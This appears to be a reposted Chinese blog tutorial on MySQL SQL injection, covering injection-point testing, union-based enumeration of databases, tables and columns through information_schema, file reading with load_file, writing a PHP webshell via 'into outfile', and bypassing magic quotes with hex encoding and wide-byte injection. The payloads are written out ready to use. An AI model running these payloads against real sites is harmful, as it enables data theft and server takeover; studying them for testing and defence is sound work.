2. 程式人生 > 其它 >WEB漏洞-SQL注入之MYSQL注入

WEB漏洞-SQL注入之MYSQL注入

阿新 發佈:2022-03-15

判斷注入位置

以下可能都存在注入

xxx.xxx.xxx/index.php?id=8
xxx.xxx.xxx/?id=10
xxx.xxx.xxx/?id=10&x=1
xxx.xxxx.xxx/index.php  post注入,可能注入的位置在正文

引數x有注入,以下哪個注入測試正確 2、3正確

xxx.xxx.xxx/news.php?y=1 and 1=1&x=2  這個是判斷了y,沒判斷了x
xxx.xxx.xxx/news.php?y=1&x=2 and 1=1
xxx.xxx.xxx/news.php?y=l and 1=1&x=2 and 1=1
xxx.xxx.xxx/news.php?xx=1 and 1=1&xxx=2 and 1=1
引數名不對

注入過程

判斷是否有注入

隨便輸入,如果有404,500,302等,說明有過濾,那麼注入的可能性就小

判斷列數

order by

判斷回顯位置

id=-1 union select 1,2,,,,

資訊收集

  • 資料庫版本 version()

  • 資料庫名字 database()

  • 資料庫使用者 user()

  • 作業系統 @@version_compile_os

ps:在mysql5.0以上版本中,mysql存在一個自導資料庫名為information_schema,他是一個儲存記錄所有資料庫名,表名,列名的資料庫

資料庫中符號.表示下一級的意思,mysql.table表示mysql資料庫下的table表

  • information_schema.schema
  • information_schema.tables
  • information_schema.columns
  • table_name
  • column_name
  • group_concat 將一行的內容都用逗號連線起來

跨庫查詢

information_schema 表特性,記錄庫名,表名,列名對應表

獲取所有資料庫名
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata 

查表,找與網站對應的資料庫名,若沒有,則挨個查。或者使用 union select 1,2,database()
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'qqyw'

跨庫查列,,,
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'admin' and table_schema='qqyw'

查結果。。。
?id=-1 union select 1,u,p from qqyw.admin
  • select * from mysql.user檢視使用者的許可權,跨庫需要高許可權使用者

檔案讀寫操作

  
路徑獲取常見方法:
報錯顯示   (phpinfo.php)   ,遺留檔案      ,漏洞報錯,平臺配置檔案

常見讀取檔案列表:(需得知網站絕對路徑)
union select 1,load_file('D:\\phpmyadmin\\dudu.txt'),3 

常見寫入檔案問題:魔術引號開關
union select 1,'<?php $eval($_POST['dudu']);?>',3 into outfile 'D:\\www\\dudu.php'

讀取檔案函式

  • load_file():讀取檔案函式
  • 百度搜索load_file讀取敏感資訊
    • 系統敏感檔案、配置檔案
    • 日誌
    • 第三方軟體賬號密碼
    • 第三方軟體配置檔案
  • into outfile或者into dumpfile:匯出函式,會新建檔案

想要進行檔案讀寫操作,還有一個關鍵點,就是獲得檔案路徑

獲得檔案路徑

  • 報錯顯示

intext:warning inurl:php

inurl:phpinfo.php

  • 遺留檔案
  • 漏洞報錯
  • 平臺配置檔案
  • 爆破

知道檔案路徑後,union select 1,load_file('D:\phpmyadmin\dudu.txt'),3

常見寫入檔案問題:魔術引號開關,需要是Off才能注入成功

  • magic_quotes_gpc=Off以及程式碼中沒有使用addslashes()函式;如果開關時開的時候,輸入資料中包含單引號,雙引號,\,和NULL等字元,都會被加上反斜線,即轉義,防止sql注入產生,

  • union select 1,'<?php $eval($_POST['dudu']);?>',3 into outfile 'D:\\www\\dudu.php'

1.給檔案讀寫許可權 

2.my.ini新增secure_file_priv =

3.雙斜槓防止轉義

4.--+或者%23註釋limit

如果開啟魔術引號開啟,繞過方法

  • 編碼(十六進位制編碼)
  • 位元組繞過
寬位元組注入是由於不同編碼中中英文所佔字元的不同所導致,這種注入方式一般出現在 PHP+MySQL,且通常是由於MySQL資料庫使用了 GBK 編碼,此時它會將兩個字元認為是一個漢字。(注:其中前一個字元的 ascii 碼要大於128,才到漢字的範圍),反斜槓的 URL 編碼為 %5c ,而 %df%5c 又會被認為是漢字 "運",當輸入 %df' 時,像 addslashes() 函式就會轉義單引號 %df\' 即 %df%5c' ,最後經過 GBK 編碼之後就為 運' ,這樣單引號就逃逸出來了。

低版本注入配合讀取或者暴力

5.0版本以下,跑字典。。
字典或讀取

相關推薦

WEB漏洞-SQL注入MYSQL注入

判斷注入位置 以下可能都存在注入 xxx.xxx.xxx/index.php?id=8 xxx.xxx.xxx/?id=10 xxx.xxx.xxx/?id=10&x=1

十三:SQL注入MYSQL注入

MYSQL注入中首先要明確當前注入點許可權,高許可權注入時有更多的攻擊手法,有的能直接進行getshell操作,其中也會遇到很多的阻礙,相關防禦手法也要明確,所謂知己知彼,百戰不殆。作為安全開發工作者,攻防兼備。

SQL注入MySQL注入

前言 MYSQL注入中首先要明確當前注入點許可權,高許可權注入時有更多的攻擊手法,有的能直接進行getshell操作。其中也會遇到很多阻礙,相關防禦方案也要明確,所謂知己知彼,百戰不殆。不論作為攻擊還是防禦都需要了

Web安全-SQL注入MySQL注入天書(5-6) Blind Injection

文章目錄內容布林型盲注##########注入點判斷撞資料庫版本撞資料庫名使用sqlmap做布林型盲注的猜解

12 WEB漏洞-SQL注入

免責宣告: 內容僅用於技術研究,禁止使用文章中的技術進行非法行為,如利用文章中技術進行非法行為造成的後果與本文作者無關。

sql注入Mysql資料庫(二)

1.前言 前面述說了Mysql滲透時用的基礎知識後,本章內容述說Mysql注入時所用的語法知識

sql注入union注入

聯合查詢注入利用的前提: 必須要有回顯 聯合查詢過程: 判斷是否存在注入

SQL注入堆疊注入(堆查詢注入

Stached injection -- 堆疊注入 0x00 堆疊注入的定義 ​ Stackedinjection 漢語翻譯過來後,稱為堆查詢注入,也有稱之為堆疊注入。堆疊注入為攻擊者提供了很多的攻擊手段,通過新增一個新的查詢或者終止查詢,可以達

Sql注入簡要注入

知識點: 1.在mysql5.0以上版本中,mysq1存在一個自帶資料庫名為 information_schema, 它是一個儲存記錄所有資料庫名, 表名,列名的資料庫,

新手科普 | MySQL手工注入基本注入流程

MySQL手工注入的基本步驟以及一些技巧的記錄,當出現學習手工注入的時候,網上的文章參差不齊,導致很長一段時間對手工注入的理解一直處於一知半解的狀態,特此記錄本文,讓小白們少走些彎路。本文只針對手工注入小白

案例講解WEB 漏洞-檔案操作檔案下載讀取

目錄原理漏洞危害利用方式系統檔案window常見敏感檔案參考任意檔案讀取任意檔案下載Google search漏洞利用程式碼漏洞挖掘漏洞驗證漏洞防範案例pikuchu靶場-檔案下載測試小米路由器-檔案讀取真實測試-漏洞RoarCTF2019

封神臺-Access注入Cookie注入

Access注入Cookie注入 我們進入新聞頁面,隨便點選一條新聞進入 我們通過測試發現URL傳參是有檢測的,有WAF進行攔截,於是我們換一種思路,測試一下Cookie注入

WEB漏洞——SQL

sql手動注入,sqlmap用法 由於我的部落格是學到滲透的時候才做的,沒有關於WEB漏洞的筆記,現在發現WEB層面的漏洞有些不太熟悉了,邊寫一下筆記邊複習一下,就從sql注入開始吧

spring成神路第七篇:DI依賴注入手動注入

本文內容 主要介紹xml中依賴注入的配置 構造器注入的3種方式詳解 set方法注入詳解

33:WEB漏洞-邏輯越權水平垂直越權全解

思維導圖 知識點 水平越權,垂直越權,未授權訪問 解釋,原理,檢測,利用,防禦等

34:WEB漏洞-邏輯越權登入脆弱及支付篡改

知識點 登入應用功能點安全問題 檢測功能點,檢測,危害,修復方案等 1.登入點暴力破解

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

SQL注入DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試。測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

WEB安全-SQL注入漏洞測試(時間盲注)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了

sql注入報錯注入

1.updatexml()函式 updatexml(xml_target, xpath_expr, new_xml)接受三個引數,此函式將xml標記的給定片段的單個部分xml_target替換為新的new_xml,然後返回更改後的xml。如果xpath寫入錯誤格式,就會報錯,並且返